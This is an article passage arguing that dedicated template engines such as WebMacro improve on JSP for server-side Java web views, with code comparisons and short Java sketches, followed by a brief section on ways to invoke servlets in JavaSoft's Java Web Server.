Around this time JSP 0.90 came along. With this new technology you could put snippets of Java code inside your HTML, and the server would automatically create a servlet from the page. This helped quite a lot. There was no attempt to hide the Servlet API; JSP was considered a "cheap" way for a Java programmer to write a servlet. All the HTML code could be included directly without out.println() calls, and page creators could make changes to the HTML without serious risk of breaking the Java code. But having artists and developers working on the same file wasn't ideal, and having Java inside HTML proved almost as awkward as having HTML inside Java. It could easily create a hard-to-read mess.
So people matured in their use of JSP and started to rely more on JavaBeans. Beans were written to contain the business logic code needed by the JSP page. Much of the code inside the JSP page could be moved out of the page into the bean, with only minimal hooks left behind where the page would access the bean.
More recently, people have started to note that JSP pages used this way are really a "view". They're a component used to display the results of a client request. So people thought: Why submit a request directly to a "view"? What if the targeted "view" isn't the proper view for that request? After all, many requests have several possible resulting views. For example, the same request might generate a success page, a database exception error report, or a required parameter missing error report. The same request might also generate a page in English or a page in Spanish, depending on the client's locale. Why must a client directly submit its request to a view? Shouldn't the client make a request to some general server component and let the server determine the JSP view to return?
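The idea of a general server component that picks among several possible views can be sketched in plain Java. This is a minimal illustration, not a servlet: the class name, the required "id" parameter, and the JSP file paths are all hypothetical. In a real servlet container the chosen path would typically be handed to request.getRequestDispatcher(path).forward(request, response).

```java
import java.util.Collections;
import java.util.Locale;
import java.util.Map;

/** Sketch of a server component that selects the view for a request (hypothetical names). */
final class ViewSelectionSketch {

    /**
     * Returns the path of the view to render. The same request can end in a
     * success page, a missing-parameter report, or a database error report,
     * each in English or Spanish depending on the client's locale.
     */
    static String selectView(Map<String, String> params, boolean databaseFailed, Locale locale) {
        // Only Spanish and English are supported here; anything else falls back to English.
        String lang = "es".equals(locale.getLanguage()) ? "es" : "en";
        if (!params.containsKey("id")) {
            return "/" + lang + "/missing-parameter.jsp";
        }
        if (databaseFailed) {
            return "/" + lang + "/database-error.jsp";
        }
        return "/" + lang + "/success.jsp";
    }

    public static void main(String[] args) {
        Map<String, String> params = Collections.singletonMap("id", "7");
        System.out.println(selectView(params, false, Locale.ENGLISH));
        System.out.println(selectView(params, true, Locale.forLanguageTag("es-MX")));
        System.out.println(
                selectView(Collections.<String, String>emptyMap(), false, Locale.ENGLISH));
    }
}
```

Because the decision lives in one method, none of the view pages needs to know that the alternatives exist.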
This belief caused many people to adopt what has been called the "Model 2" design, named after an architecture laid out in the JSP 0.92 specification and based on the model-view-controller pattern. With this design, requests are submitted to a servlet "controller" that performs business logic and generates an appropriate data "model" to be displayed. This data is then passed internally to a JSP page "view" for rendering, where it appears to the JSP page like a normal embedded JavaBean. The appropriate JSP page can be selected to do the display, depending on the logic inside the controlling servlet. The JSP page becomes a nice template view. This was another improvement -- and where many serious developers stand today.
Enter Template Engines
But why suffer the complexity of JSP just to do templating? Might it not be better to use a dedicated template engine? By using a template engine intended for this exact use instead of the general-purpose JSP, the underlying design can be cleaner, the syntax clearer, the error messages more meaningful, and the tool more customizable. Several companies have built such engines, the most popular probably being WebMacro (http://webmacro.org, from Semiotek), whose engine is free. Using a dedicated template engine instead of JSP offers several technical advantages that developers should be aware of:
Problem #1: Java Code Too Tempting
JSP makes it tempting to put Java code in the web page, even though that's considered bad design. Just as Java improves on C++ by removing the ability to use global variables and multiple inheritance, so do template engines improve on JSP by removing the ability to put raw code in the page. Template engines enforce good design.
Problem #2: Java Code Required
Doing mundane things in JSP can actually demand putting Java code in the page. For example, assume the page needs to determine the context root of the current web application to create a link to the web app home page. In JSP this is best done using Java code:
<a href="<%= request.getContextPath() %>/index.html">Home page</a>
You can try to avoid Java code using the <jsp:getProperty> tag, but that leaves you with the following hard-to-read string:
<a href="<jsp:getProperty name="request" property="contextPath"/>/index.html">HomePage</a>
Using a template engine there's no Java code and no ugly syntax. Here's the same command written in WebMacro:
<a href="$Request.ContextPath;/index.html">Home page</a>
In WebMacro, ContextPath is seen as a property of the $Request variable, accessed using a Perl-like syntax. Other template engines use other syntax styles.
As another example where JSP requires Java code in the page, assume an advanced "view" needs to set a cookie to record the user's default color scheme -- a task that presumably should be done by the view and not the servlet controller. In JSP it requires Java code:
<% Cookie c = new Cookie("colorscheme", "blue"); response.addCookie(c); %>
In WebMacro there's no Java code:
#set $Cookie.colorscheme = "blue"
As a last example, assume it's time to retrieve the color scheme cookie. For the benefit of JSP, we can presume there's also a utility class available to help, since doing this raw with getCookies() is ridiculously difficult. In JSP:
<% String colorscheme = ServletUtils.getCookie(request, "colorscheme"); %>
In WebMacro there's no need for a utility class and it's always:
$Cookie.colorscheme.Value
For graphics artists writing JSP pages, which syntax would be simpler to learn?
JSP 1.1 introduced custom tags (allowing arbitrary HTML-like tags to appear in JSP pages, executing Java code on the backend), which may help with tasks like this, assuming a widely known, fully featured, freely available, standardized tag library emerges. So far that has yet to occur.
Problem #3: Simple Tasks are Hard
Doing even a simple task such as header and footer includes is overly difficult with JSP. Assume there's a "header" template and a "footer" template to be included on all pages, and each template includes in its content the current page title. In JSP the best way to do this is as follows:
<% String title = "The Page Title"; %>
<%@ include file="/header.jsp" %>
Your content here
<%@ include file="/footer.jsp" %>
Page creators must not forget the semi-colon in the first line and must make sure to declare title as a Java String. Plus, /header.jsp and /footer.jsp must be made publicly accessible somewhere under the document root even though they aren't full pages themselves. In WebMacro including headers and footers is done easily:
#set $title = "The Page Title"
#parse "header.wm"
Your content here
#parse "footer.wm"
There are no semi-colons or String types for designers to remember, and the .wm files are found in a customizable search path, not under the document root.
Problem #4: Lousy Looping
Looping is overly difficult in JSP. Here's the JSP code to iterate over a vector of ISP objects, printing the name of each:
<%
Enumeration e = list.elements();
while (e.hasMoreElements()) {
  out.print("The next name is ");
  out.println(((ISP)e.nextElement()).getName());
  out.print("<br>");
}
%>
Someday there will be custom tags for doing these loops. And custom tags for "if" checks too. And JSP pages may look like a grotesque Java reimplemented with tags. But meanwhile, the WebMacro loop is already quite nice:
#foreach $isp in $isps {
  The next name is $isp.Name <br>
}
The #foreach directive could be replaced by a custom #foreach-backwards directive fairly easily as well if such a thing were necessary.
Will custom tags really solve this problem? Probably not. Here's a possible <foreach> tag:
<foreach item="isp" list="isps">
  The next name is <jsp:getProperty name="isp" property="name"/> <br>
</foreach>
Which would a graphics artist prefer?
Problem #5: Useless Error Messages
JSP page syntax errors can cause surprisingly odd and useless error messages. This is because the page is transformed into a servlet and then compiled. Good JSP tools can help narrow down errors to likely syntax error locations, but even the best of tools will probably have problems making all error messages meaningful. Some errors will just be impossible for tools to diagnose, due to the transformation.
For example, assume a JSP page needs to set a title common across all pages. What's wrong with the following?
<% static String title = "Global title"; %>
Well, the Tomcat reference implementation for JSP says this is wrong:
work/%3A8080%2F/JC_0002ejspJC_jsp_1.java:70: Statement expected.
static int count = 0;
^
This cryptic error is trying to say that scriptlets like the above are placed inside the _jspService() method and static variables aren't allowed inside methods. The syntax should be <%! %>. Page designers won't recognize this error, and programmers likely won't either without looking at the generated source. Even the best tools probably won't be much help with errors such as these.
Assuming all the Java code could be moved out of the page, that still doesn't solve this problem. What's wrong with this expression that prints the value of count?
<% count %>
The Tomcat engine says:
work/8080/_0002ftest_0002ejsptest_jsp_0.java:56: Class count not found in type declaration.
count
^
work/8080/_0002ftest_0002ejsptest_jsp_0.java:59: Invalid declaration.
out.write("\r\n");
^
In other words, there's an equal sign missing. It should be <%= count %>.
Because a template engine can operate directly on the template file without any "magical" translation to code, it's far easier to properly report errors. To use an analogy: When commands are typed into a command line Unix shell written in C, you don't want the shell to create a C program to execute the command. You want the shell to simply interpret the command and behave accordingly, with direct error messages when necessary.
Problem #6: Need a Compiler
JSP requires a compiler be shipped with the webserver. That's problematic, especially since Sun doesn't give away the tools.jar library containing their javac compiler. Web servers can package an outside vendor's compiler such as IBM's jikes; however such compilers generally don't work on all platforms and (being written in C++) aren't much help to a pure-Java web server. JSP has a pre-compile option that can help some here, although that's a less than elegant solution.
Problem #7: Wasted Space
JSP consumes extra hard drive space and extra memory space. For every 30K JSP file on the server there must be a corresponding larger-than-30K class file created. This essentially doubles the hard drive requirements to store JSP pages. Considering how easily a JSP file can <%@ include> a large data file for display, this becomes a real concern. Also, each JSP's class file data must be loaded into the server's memory, meaning the server may eventually store the entire JSP document tree in memory. A few JVMs have the ability to remove class file data from memory; however, the programmer generally has no control over the rules for reclaiming, and for large sites the reclaiming probably won't be aggressive enough. With template engines there's no need to duplicate the page data into a second file, so hard drive space is spared. Template engines also give the programmer full control over how templates are cached in memory.
There are also some downsides to using a template engine:
Template Problem #1: No Specification
No specification exists for how a template engine should behave. However, it's interesting to note that this is far less important than with JSP because, unlike JSP, template engines demand nothing special of the web server -- any server supporting servlets supports template engines (including API 2.0 servers like Apache/JServ which can't fully support JSP)! Healthy competition for the best template engine design could actually spark innovation, especially assuming open source implementations that can leverage each other's ideas and code. As it stands now, WebMacro exists like Perl, a tool where the open source implementation is the specification.
Template Problem #2: Not Widely Known
Template engines aren't widely known. JSP has had a tremendous amount of marketing and has gained terrific mind share. Using template engines is a relatively unknown alternative technique.
Template Problem #3: Not Yet Tuned
Template engines have yet to be highly tuned. No performance numbers have been taken comparing template engine and JSP performance. Theoretically, a well-tuned implementation of a template engine should match a tuned implementation of JSP; however, in the world today, considering the effort third-party vendors have given to JSP so far, the odds are good that JSP implementations are better tuned.
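To make the earlier point about direct interpretation concrete, here is a minimal sketch of a template renderer that works on the template text itself rather than translating it to Java source first. It is not WebMacro's implementation or syntax: the class name is hypothetical, and it supports only plain $name placeholders looked up in a map. Because it sees the template directly, it can report an undefined variable by name and position.

```java
import java.util.Collections;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Sketch of a template renderer that interprets the template directly (hypothetical). */
final class TinyTemplateSketch {

    // A placeholder is '$' followed by an identifier, e.g. $title.
    private static final Pattern VARIABLE = Pattern.compile("\\$([A-Za-z_][A-Za-z0-9_]*)");

    /** Replaces each $name with its value from the context, failing with a direct message. */
    static String render(String template, Map<String, String> context) {
        Matcher m = VARIABLE.matcher(template);
        StringBuilder out = new StringBuilder();
        int last = 0;
        while (m.find()) {
            String name = m.group(1);
            String value = context.get(name);
            if (value == null) {
                // The error points at the template itself, not at generated code.
                throw new IllegalArgumentException(
                        "Undefined variable $" + name + " at character " + m.start());
            }
            out.append(template, last, m.start()).append(value);
            last = m.end();
        }
        return out.append(template.substring(last)).toString();
    }

    public static void main(String[] args) {
        Map<String, String> context = Collections.singletonMap("title", "The Page Title");
        System.out.println(render("<title>$title</title>", context));
    }
}
```

A real engine adds directives, property access, and caching, but the error-reporting advantage comes from this same structure: there is no intermediate compile step to obscure where the mistake is.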
The Java Web Server is JavaSoft's own web server. It is just one part of a larger framework, intended to provide you not only with a web server but also with tools to build customized network servers for any Internet or intranet client/server system. Servlets are to a web server what applets are to the browser.
A client can invoke Servlets in the following ways:

The client can request a document that is served by the Servlet.
The client (browser) can invoke the Servlet directly using a URL, once it has been mapped using the Servlet Aliases section of the admin GUI.
The Servlet can be invoked through server-side include tags.
The Servlet can be invoked by placing it in the Servlets/ directory.
The Servlet can be invoked by using it in a filter chain.
